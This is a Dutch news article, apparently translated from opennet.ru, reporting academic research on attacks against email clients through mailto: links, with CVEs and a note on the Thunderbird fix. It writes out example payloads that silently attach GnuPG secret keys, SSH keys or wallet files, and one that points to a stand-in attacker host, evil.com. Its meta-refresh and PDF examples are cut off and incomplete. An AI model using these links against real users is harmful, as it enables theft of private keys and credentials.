Aanvallen op e-mailclientgebruikers door middel van 'mailto:'-links

Onderzoekers van de Ruhr-Universiteit Bochum (Duitsland) hebben geanalyseerd (PDF) het gedrag van e-mailclients bij het verwerken van 'mailto:'-links met uitgebreide parameters. Vijf van de twintig onderzochte e-mailclients bleken kwetsbaar voor een aanval die bronnen manipuleert via de 'attach'-parameter. Nog eens zes e-mailclients waren kwetsbaar voor aanvallen die de vervanging van PGP- en S/MIME-sleutels mogelijk maakten, en drie clients bleken kwetsbaar voor aanvallen die de inhoud van versleutelde berichten extraheren.

Links 'mailto:' worden gebruikt voor het automatisch openen van de e-mailclient met als doel een brief te schrijven aan de ontvanger die in de link is opgegeven. Naast het adres in de link kunnen aanvullende parameters worden opgegeven, zoals het onderwerp van de e-mail en een sjabloon voor de standaardinhoud. De voorgestelde aanval manipuleert de 'attach'-parameter, die het mogelijk maakt om een bijlage toe te voegen aan de te creëren e-mail.

De e-mailclients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) en Pegasus Mail bleken kwetsbaar voor een triviale aanval, waarmee elk lokaal bestand dat via een link van het type 'mailto:?attach=pad_naar_bestand' is opgegeven, automatisch kan worden bijgevoegd. Het bestand wordt zonder waarschuwing toegevoegd, zodat de gebruiker zonder speciale aandacht wellicht niet opmerkt dat de e-mail met een bijlage wordt verzonden.

Bijvoorbeeld, met een link van het type 'mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.gnupg/secring.gpg' kunnen de privésleutels van GnuPG in de e-mail worden opgenomen. Ook kan de inhoud van cryptovaluta-portefeuilles (~/.bitcoin/wallet.dat), SSH-sleutels (~/.ssh/id_rsa), en elk ander toegankelijk bestand van de gebruiker worden verstuurd. Bovendien stelt Thunderbird gebruikers in staat om groepen bestanden via een wildcard toe te voegen met constructies zoals 'attach=/tmp/*.txt'.

Naast lokale bestanden verwerken sommige e-mailclients ook links naar netwerkschijven en paden op een IMAP-server. IBM Notes laat bijvoorbeeld toe om een bestand uit een netwerkmap over te dragen bij het verwerken van links van het type 'attach=\\evil.com\dummyfile', en kan ook NTLM-authenticatieparameters onderscheppen door een link naar een SMB-server onder controle van de aanvaller te sturen (de aanvraag wordt verzonden met de huidige authenticatieparameters van de gebruiker).

Thunderbird verwerkt succesvol aanvragen zoals «attach=imap://fetch>UID>/INBOX>1/», waardoor inhoud uit mappen op een IMAP-server kan worden bijgevoegd. De e-mails die vanuit IMAP worden gehaald en die zijn versleuteld via OpenPGP en S/MIME, worden automatisch door de e-mailclient ontsleuteld voordat ze worden verzonden. De ontwikkelaars van Thunderbird waren in het verleden zijn geïnformeerd op de hoogte van het probleem in februari en in de release Thunderbird 78 is het probleem inmiddels verholpen (de versies Thunderbird 52, 60 en 68 blijven kwetsbaar).

Oude versies van Thunderbird zijn ook kwetsbaar gebleken voor twee andere aanvalsvormen op PGP en S/MIME, zoals voorgesteld door onderzoekers. In het bijzonder is de aanval met sleutelvervanging toepasbaar op Thunderbird, evenals op OutLook, PostBox, eM Client, MailMate en R2Mail2, omdat de e-mailclient automatisch nieuwe certificaten importeert en instelt die in S/MIME-berichten worden verzonden, waardoor een aanvaller in staat is om al opgeslagen publieke sleutels van de gebruiker te vervalsen.

De tweede aanval, waarvoor Thunderbird, PostBox en MailMate kwetsbaar zijn, manipuleert de kenmerken van de automatische opslaan-functie van berichten en stelt in staat om met behulp van mailto-parameters de ontsleuteling van versleutelde berichten te initiëren of een digitale handtekening voor willekeurige berichten toe te voegen, met de daaropvolgende overdracht van het resultaat naar de IMAP-server van de aanvaller. De ciphertext wordt bij deze aanval verzonden via de parameter «body», en een «meta refresh»-tag wordt gebruikt om een verzoek naar de IMAP-server van de aanvaller te initiëren. Bijvoorbeeld: ‘<meta http-equiv=

Voor automatische verwerking van «mailto:»-links zonder gebruikersinmenging kunnen speciaal opgemaakte PDF-documenten worden gebruikt – de OpenAction-functie in PDF maakt het mogelijk om automatisch de mailto-handler te starten wanneer het document wordt geopend:

%PDF-1.5
1 0 obj
<>
endobj

2 0 obj
<>
endobj

Aanval op gebruikers van e-mailclients via «mailto:»-links

Bron: opennet.ru

Koop betrouwbare webhosting met bescherming tegen DDoS, VPS VDS servers 🔥 Koop betrouwbare webhosting met bescherming tegen DDoS, VPS VDS servers | ProHoster